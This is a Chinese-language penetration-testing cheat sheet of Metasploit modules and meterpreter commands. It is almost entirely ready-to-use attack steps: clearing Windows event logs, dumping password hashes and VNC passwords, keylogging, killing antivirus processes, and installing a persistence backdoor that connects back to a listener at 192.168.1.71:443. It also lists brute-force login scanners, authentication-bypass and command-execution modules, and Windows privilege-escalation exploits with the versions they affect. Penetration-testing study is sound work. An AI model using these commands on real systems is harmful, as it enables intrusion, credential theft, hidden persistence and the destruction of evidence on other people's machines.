渗透测试笔记2-MSF常用模块记录

运行自动化脚本

msfconsole -r auto.rc

检测是否为虚拟机

post/windows/gather/checkvm

获取磁盘信息

windows/gather/forensics/enum_drives

补丁信息

run post/windows/gather/enum_patches

事务日志

查看:

run event_manager -i

清除:

run event_manager -c

获取敏感信息

run post/windows/gather/enum_applications #获取安装软件信息

run post/windows/gather/dumplinks #获取最近的文件操作

run post/windows/gather/enum_ie #获取IE缓存

run post/windows/gather/enum_chrome #获取Chrome缓存

run post/windows/gather/enum_shares #列出共享及历史共享

run enum_vmware #列出vmware的配置文件和产品

run scraper #从目标主机获得所有网络共享等信息

run getcountermeasure #显示HIPS和AV进程的列表,显示远程机器的防火墙规则,列出DEP和UAC策略

run hashdump #获得密码哈希值

run windows/gather/smart_hashdump #获取哈希值,功能更强大

run keylogrecorder #记录键盘信息

run get_env #获取所有用户的环境变量

run getvncpw #获取VNC账户密码

网络信息

run packetrecorder #查看目标系统的所有网络流量,并且进行数据包记录,-i 1指定记录数据包的网卡

run get_local_subnets #得到本地子网网段

run arp_scanner-r 192.168.1.0/24 #利用arp进行存活主机扫描

绕过防火墙

run killav #终止Av进程,可以很快的清除我们的路径和有效渗透测试的记录

run getcountermeasure #列出HIPS 和 AV 的进程,显示XP 防火墙规则, 并且显示 DEP和UAC 策略
Ps:-k参数可以杀掉防护软件进程

持久后门

run persistence #用作持久后门

1
2
3
4
5
6
7
8
9
10
11
-A   自动启动一个匹配的exploit / multi / handler来连接到代理
-L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置。
-P 有效负载使用,默认为windows / meterpreter / reverse_tcp。
-S 作为服务自动启动代理程序(具有SYSTEM权限)
-T 要使用的备用可执行模板
-U 用户登录时自动启动代理
-X 系统引导时自动启动代理程序
-h 这个帮助菜单
-i 每次连接尝试之间的时间间隔(秒)
-p 运行Metasploit的系统正在侦听的端口
-r 运行Metasploit监听连接的系统的IP

run persistence -U -i 5 -p 443 -r 192.168.1.71

开启远程桌面

run post/windows/manage/enable_rdp

run win32-sshserver #安装openssh服务

run vnc #可以看到远程桌面

一些常用的破解模块

auxiliary/scanner/mssql/mssql_login

auxiliary/scanner/ftp/ftp_login

auxiliary/scanner/ssh/ssh_login

auxiliary/scanner/telnet/telnet_login

auxiliary/scanner/smb/smb_login

auxiliary/scanner/mssql/mssql_login

auxiliary/scanner/mysql/mysql_login

auxiliary/scanner/oracle/oracle_login

auxiliary/scanner/postgres/postgres_login

auxiliary/scanner/vnc/vnc_login

auxiliary/scanner/pcanywhere/pcanywhere_login

auxiliary/scanner/snmp/snmp_login

auxiliary/scanner/ftp/anonymous

一些好用的模块

auxiliary/admin/realvnc_41_bypass (Bypass VNCV4网上也有利用工具)

auxiliary/admin/cisco/cisco_secure_acs_bypass (cisco Bypass 版本5.1或者未打补丁5.2版洞略老)

auxiliary/admin/http/jboss_deploymentfilerepository (内网遇到Jboss最爱:))

auxiliary/admin/http/dlink_dir_300_600_exec_noauth (Dlink 命令执行:)

auxiliary/admin/mssql/mssql_exec (用爆破得到的sa弱口令进行执行命令没回显:()

auxiliary/scanner/http/jboss_vulnscan (Jboss 内网渗透的好朋友)

auxiliary/admin/mysql/mysql_sql (用爆破得到的弱口令执行sql语句:)

auxiliary/admin/oracle/post_exploitation/win32exec (爆破得到Oracle弱口令来Win32命令执行)

auxiliary/admin/postgres/postgres_sql (爆破得到的postgres用户来执行sql语句)

auxiliary/scanner/rsync/modules_list (Rsync)

auxiliary/scanner/misc/redis_server (Redis)

auxiliary/scanner/ssl/openssl_heartbleed (心脏滴血)

auxiliary/scanner/mongodb/mongodb_login (Mongodb)

auxiliary/scanner/elasticsearch/indices_enum (elasticsearch)

auxiliary/scanner/http/axis_local_file_include (axis本地文件包含)

auxiliary/scanner/http/http_put (http Put)

auxiliary/scanner/http/gitlab_user_enum (获取内网gitlab用户)

auxiliary/scanner/http/jenkins_enum (获取内网jenkins用户)

auxiliary/scanner/http/svn_scanner (svn Hunter :))

auxiliary/scanner/http/tomcat_mgr_login (Tomcat 爆破)

auxiliary/scanner/http/zabbix_login (Zabbix :))

权限提升

ms10-073\ms10-092

ms14-002

Windows XP
Windows Server 2003

ms15-001

ms15_051

Microsoft Windows Vista
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2012
Microsoft Windows Server 2008 R2
Microsoft Windows Server 2008
Microsoft Windows Server 2003
Microsoft Windows RT 8.1
Microsoft Windows RT
Microsoft Windows 8.1
Microsoft Windows 8
Microsoft Windows 7

ms16-016

根据微软官方信息显示,此漏洞存在于在:

Windows Vista SP2
Windows Server 2008 x86 & x64
Windows Server 2008 R2 x64
Windows 7 x86 & x64
Windows 8.1 x86 & x64

系统中提升权限至系统权限,以下系统中导致系统拒绝服务(蓝屏):

Windows Server 2012
Windows Server 2012 R2
Windows RT 8.1
Windows 10

ms16-032

多exp

MS16-075(烂土豆)

全版本通杀

ms

UAC提权

提高程序运行级别(runas)

exploit/windows/local/ask

绕过UAC

exploit/windows/local/bypassuac

模块执行成功后,执行getuid发现还是普通权限,不要失望,继续执行getsystem,再次查看权限,成功绕过UAC,且已经是系统权限了。

CVE-2018-8120

Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 7 for 32-bit Systems SP1

mysql 提权

mysql_mof mof提权

远程代码执行

ms15-020

生成link共享文件